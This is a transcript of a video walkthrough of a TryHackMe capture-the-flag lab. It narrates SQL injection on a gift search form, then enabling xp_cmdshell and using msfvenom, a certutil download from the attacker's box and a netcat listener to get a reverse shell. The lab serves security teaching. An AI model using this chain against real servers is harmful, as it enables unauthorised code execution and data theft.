Hello everyone and welcome to day 10 of TryHackMe's Advent of Cyber. My name is Insider PhD, also known as Katie. If you're a regular viewer to my channel, you have no idea what's going on. Advent of Cyber is an event that TryHackMe runs every year, where you can complete challenges in the days up till Christmas, so December 1st to December 24th. And you complete like little cybersecurity challenges. You get to see like a really broad range of different kinds of challenges, and it really pushes you out of your comfort zone. There are prizes if you do complete it and finish it. You can see the prizes up here. You also get a nice certificate and badge, and I actually got these last year. I finished it all. So we're on day 10. You can see some of the breadth if you, again, haven't been doing Advent of Cyber. There are machine learning, brute forcing, reverse engineering, log analysis, forensics. It's very broad. So today we're going to be doing day 10, which is SQL injection. Inject the halls with exec query. So I'm going to start by starting the machine because it takes about 5 minutes for this machine to actually boot up. So meanwhile, where are we at in the story? The Best Festival company started receiving too many reports at their company website, bestfestival.thm, is displaying some concerning information about the state of Christmas this year. After looking into the matter, Santa's Security Operations Center confirmed that the company website has been hijacked and ultimately defaced, causing significant reputational damage. To make matters worse, the web development team has been locked out of the web server as the user credentials have been changed. With no other way to revert the changes, ELF Exploit McRed has been tasked with attempting to hack back into the server. After conducting some initial research, ELF Forensic McBlue came across a forum post made on the popular Black Hat internet hacking forum Jingle Hacks. The post, made earlier this month, explains the poster is auctioning off several active vulnerabilities related to the Best Festival company systems. This forum surely explains the havoc that has gone over the past week. Armed with this knowledge, ELF Exploit McRed began testing the company website from the outside to find the vulnerable components that led to the server compromise. As a result of McRed's thorough investigation, the team now suspects a possible SQL injection vulnerability. You can see the little post here with Greedster saying, "As the merger of the Best Festival company approaches, I find myself in possession of knowledge that's good as gold. I've decided to auction off these vulnerabilities to the highest bidder. The stakes are high and the potential rewards are even higher. If you've got skills and resources to make use of all this information, you're in for a serious payday. I won't reveal all the details here, but I can confirm these vulnerabilities are both 0 days and known issues that the Best Festival company hasn't addressed. Treasure includes potential entry points, data access, and even the possibility of exposing classified information. To bid, reply to this thread with your offer. I'll provide a secure channel for the winning bidder transfer payment." We're going to also start the attack box as well, because we're going to need that. And you can see this list here tells us whether or not we need to start it. So we know that the Best Festival company has got some kind of SQL injection vulnerability, and then we're going to try and push that vulnerability really as far as we can. So I'm going to give a few minutes for both VMs to start up and be ready for me to use. Okay, so we are all set up with our attack box and our regular VM. I'm just going to grab the IP address here. And the first thing we're going to do is just double check the VM is basically successfully deployed by just checking if the website is up. So that's 10, 2, 3, 5, 8. So our virtual machines are all set up. And as we can see, we are ready to get started. We're going to start by just talking a bit about SQL and SQL injection. So SQL stands for Structured Query Language. It's essentially a language that describes data and that allows you to fetch data from a database with certain parameters. So here we have an example database. So each one of these boxes are called tables, and inside the tables we have the columns, and each of them also relate to one another. So you can imagine each individual table as like an Excel spreadsheet, but it's a bit more clever than that because you can fetch from multiple spreadsheets at once. So SQL has 4 key commands you can run on it. You can query a table, ask it to give you data. You can insert a piece of data into the table. you can update something that exists in that table, and then you can delete the data stored there. So if we have a look at this table here called table ornaments, you can see we've got an ornament ID, an elf ID, a color, a category, material, a date created, and price. So if we run a select star, so that means select every single column from table ornaments, which is the name of the table, where material equals wood, it's going to grab number 3, because number 3 is its green, its category, and its material is wood. These ones' materials are not wood, so they would not appear in that query. And here you can see we can also select specific categories as well. So maybe we only grab the ornament ID, the color, and the category, where the elf ID is 102. So on this one, we grab 3 green tree. We don't grab any other information. We only grab those 3. And here you can see an insert. So we're inserting into the table. We're providing a list of columns that we're going to give them values for, and then we put the values down here. So this 5 refers to that ornament ID, this elf ID refers to that 105, the color blue, the category star, the material glass, the date created, and the price. Now PHP. PHP is a programming language that essentially allows you to make dynamic websites. So it runs on the server side, which means before the server gives you the website, it crunches all of the PHP code and just does everything. They allow you to connect to things like databases and make really interactive websites. So the most common way for PHP to do this and connect to databases is to use PDO or PHP data objects, which is a specific extension that allows you to write queries. And you can see an example here where we have the query and then the result. So this little query, this is a variable, and this is the contents of the variable, and this is like a specific function within PDO. So this is SQL Server for Microsoft SQL Server, but you might be familiar with MySQLi, which is MySQL. So all this is doing is saying, hey, this query we're going to run using a pre-existing connection. So we provided like a username and a password, is all ready to go. The real key part of PHP is that it allows it to be dynamic. So we're not just dealing with flat kind of web pages, we're also getting more data from it. So we can see here, not only can we not specify, so up here we haven't specified we've already specified the color, we can also get the color from the query parameters. That's what this get means. This is just getting everything after .php. And here we can see that color is then appended to the end of this query, meaning that we can choose the color at the user's runtime. And so here you can see an example. We have the website, ornament search, and then a specific color of green. And again, this relates to this up here. So if we change this, we would have to change it up here as well. And so you can see that how this will work. So you specify a color, you then run the SQL select star from ornaments where the color is green, you get every green ornament. Okay, so this is where SQL injection comes in. SQL injection essentially allows you to continue writing after the intended query has finished. We start out here with the same code we had before. We're getting the color from the URL, then we're doing a select star from ornaments where color equals color, and then we're running that query. Initially, we want that color to be something supplied by the user, but what if they just continue writing? So you'll often see this, quotation mark or 1 equals 1 space dash. So this is continues at the end, and then we carry on writing. What does this mean? So we first have to close the string, because again, this is what's already been written. We then have to provide our logical 1 equals 1, and that will always be true, so we'll always return the entirety of the database, because we're saying, hey, where the color equals green, or it's true. And then finally at the end, we have the dash, and what the dash does is comment out everything that comes after it. So because we're going into the SQL mid-processing, we have to say, hey, the rest of it, just ignore. So what does this mean? So again, we have our color equals end quotation mark or 1 equals 1. We're getting the color from the URL, but that is running this query instead. Select star from table ornaments where color is an empty string or 1 equals 1, which is true. Comment out the rest of it. We can see here that we've got every single ornament no matter what the color is. So it is always true, so we grab every single color ornament. Now, there is some a bit of worry of 1 equals 1. So because 1 equals 1 is always true, if we're writing like an update statement or a delete statement, we're going to update or delete every single record in the database, because it'll have something that says, hey, only grab the one with the correct like ID. But then if you do 1 or 1, you can grab everything. You can actually check out this room on TryHackMe for a bit more information about how this works. Now, thankfully, we've confirmed that there's no risk of doing this to the website, so it's not necessarily something we need to worry about here, but still worth considering because it is a risk and you can cause some damage you didn't actually mean to cause. We then have stacked queries. Stacked queries allow attackers to finish the entire query and then add like extra queries onto the end. So it's not just, being able to edit it once, it's saying, we're going to start a brand new statement. So here you can see how we've got the end quotation mark and then the semicolon is the end of a query and says, hey, I'm going to start the next query. And you can see we can now add more queries to the end. Here's an example here. We're saying select from table ornaments with empty string. We're ending that query, starting the next one, which is our evil red broken candy cane coal, and then finishing off the end. This allows us to run multiple statements at once. How do we actually test for SQL injection? Let's have a look at the Best Festival company. We've got our little website up here, and we can see, it's quite obviously been defaced. Boring, worst, grumpy, terrible. Christmas has been cancelled this year. We do not apologise for any inconvenience. So what can we actually see on this website? We've got a Meet the Elves, which has some kind of defaced stuff, but we also have a gift search. So if we go start my gift search, and we experiment with these, I'm going to make the budget 100, a child, and then search. And you can see we've got some results back here. So we can see up here, this are the query parameters up here. So age equals child, interest equals toys, and budget equals 100. Now, if we remove one of these, say the budget, we don't get any results because there isn't like a budget of 0. So how can we start to test for this? The first thing we're going to do is add a little quotation mark. And this is like a litmus test. It gives you an idea about whether or not this is going to be successful. So if we add a little injection in here, we can actually see we've got an error message. So we can see ODBC driver for SQL Server Microsoft. So that tells us that this is definitely a Microsoft MS SQL based database. And now we can try, you can see here an example of what this might look like. So the age, the interest, the SQL, and the results. Now we don't know for sure because we can't see the code, but that's usually what we'd expect to see. So now if we change our age to be or 1 equals 1 space dash, we can see whether or not this returns every single record in the database. If it does, then this is an SQL injection because we're saying, hey, return every gift no matter what. And if we have a look, we can see we've got a full list here. And if we go to the very end, we will see we've got a flag and we will need that one later. So I'm just going to start a new tab for this. We can keep on going. Okay, so we can't only just run SQL queries. We can also run something called a stored procedure. And stored procedures are usually set up in advance and essentially allow like complex queries to be run very easily. Microsoft SQL Server actually has a stored procedure called XP command shell, and it allows you to actually execute operating system calls. So if we can call that stored procedure, we can begin to dive in more deeply into, if we can call that stored procedure, we can get a full remote code execution. So like I said, XP command shell is a stored procedure that enables the execution of operating system commands. This functionality should really be disabled on production servers. However, misconfigurations, legacy applications, it can still be enabled, and it's might be quite common to find in the wild. Maybe you've got like a old system that needs to export data and upload it. You could use integration services, or if you're using an old piece of code that uses this, you might just keep it enabled even on a production server. So we can also enable it through a series of queries. That's the first thing we're going to do, is enable it if it's not already enabled. Okay, so all I've done here is I've copied this command here to this, so we can see we're first asking it to configure show advanced options and select the first one. Then we're asking it to configure XP command shell, then reconfigure again. So we're going to press go, and you can say your gift search returned no results. And that's because these exec queries just don't return anything, though not seeing an error message is a good thing here. So how do we turn this into remote execution? So what we're going to do is create a payload that will use and get a reverse shell. So we're going to use MSF Venom to do this. MSF Venom is a command line payload generation tool. It's part of Metasploit. We're going to do MSF Venom. We're then going to tell it what kind of payload we want. So we want a Windows 64 shell reverse TCP. So that's a reverse shell, which means instead of us connected, the computer is going to connect to us. lhost, that's your attack box IP address. So you can see it's just up there in that corner. So that's 10.10.14. We're then going to provide port, so that's going to be 4444. We're going to tell it we want an exe file, and we're going to call it reverse.exe. Now we have to wait a few moments just for this to create the payload. Okay, great. So that's now made the payload. You can see here that it's saved as reverse.exe. So our next stage is we actually need to host this so we can download it. So we're going to just run a Python 3 server in this directory that has the payload in like this file directory. And you can see we're now hosting that. So we're going to go down here and we're going to run this command. So we can replace all of that what we've got. We're going to do end that query. We're going to do exec xp shell. Then we're going to use cert util url cat. Now we're going to give it our web server. So that's our attack box IP address 10.10.109/reverse.exe8000/reverse.exe. And then we're going to move that into the C directory, C drive Windows temp, and then reverse exe, end the query, say the query is over, comment out the rest of it. Now again, we see our search returned no results. It's good that it doesn't come up with an error here. So now that's done, we can start to listen for connections. So we're going to start a new one up here. We're going to do netcat lvp12. And now we're listening for connections. So the file is on the computer, but we now need to run it. So again, we're just going to get rid of all of this, and we're just going to tell it, hey, can you execute the file at Windows temp reverse exe, please? End the query, comment out the rest of it. Forgot little quotation marks. There we go. And we can see that nothing is really happening. And that's because it's now connected to our computer here. So this is our regular shell here. And so we want to find out who am I, just to see what access we've got. And we can see we are like the SQL server, which means we probably don't have that much access, but still good. So now let's see what we can find on here. Let's go into CD users, and then we can see the list of directories by doing a dir. We can CD administrator, and we can do another dir, and we can see we've got a list here. Now we can look through these files, but let's see what we actually want to do here. Manually navigate to the defaced website and find the vulnerable search form. So this is our vulnerable search form. What is the first web page you come across that contains the gift finding feature? And that is /giftsearch.php. Analyze the SQL error that is returned. What ODBC driver is being used in the back end of the website? So we can do our adding a quotation mark to get the error again. And here we can see it's ODBC driver 17 for SQL Server. I'm going to go over this side, go to the clipboard and paste it in. Inject the 1 = 1 condition into the gift search form. What is the last result being returned from the database? So we kept that open down here. So that's our quotation mark space, or 1 = 1 dash, which gets everything from the database. What flag is the note file greedster left behind on the server? We can have a look through the server, but the most likely place is going to be on the desktop. Let's go check out the desktop. And again, use dir to see what's here. And see we've got note.txt. We're going to use the type command to see what's inside that file. It's very similar to cat on Linux. And we can see here, we've got a little note. So, hey hacker, I received your Bitcoin payment. Thanks again for the speedy transactions. After you gain access to the server, you can deface the website by running the defacewebsite.bat script in user administered desktop. Feel free to dump the database and steal whatever you want. If you need to revert the changes back to the original site for any reason, just run restore website.bat from the same directory. Also, I shouldn't need to mention this, but please delete this note after defacing the website. Do not let this hack tie back to me. And we're going to go in here, take this, and paste it in here. Now we can restore it. So we're going to run the file restore, what's it called? Restore website.bat. And now it's going to run the code in there. We can now refresh the home page, and we can see, yes, we've got the flag, but Santa's workshop has no longer been defaced. And we're turning off the gift search functionality for a bit, which I think is probably the right decision. Those are all the flags. If you enjoyed this task, there are other rooms here for you to do, which is the software security modules, which goes through a lot of this. It goes through the OWASP top 10, OWASP API top 10, but also SAST, DAST, weaponizing vulnerabilities, etc. So if you are interested, you can continue learning. But that is day 10 complete. Thank you very much, everybody, for watching. I hope you're enjoying Advent of Cyber. I am. So I will see you all in the next video. Bye, everyone.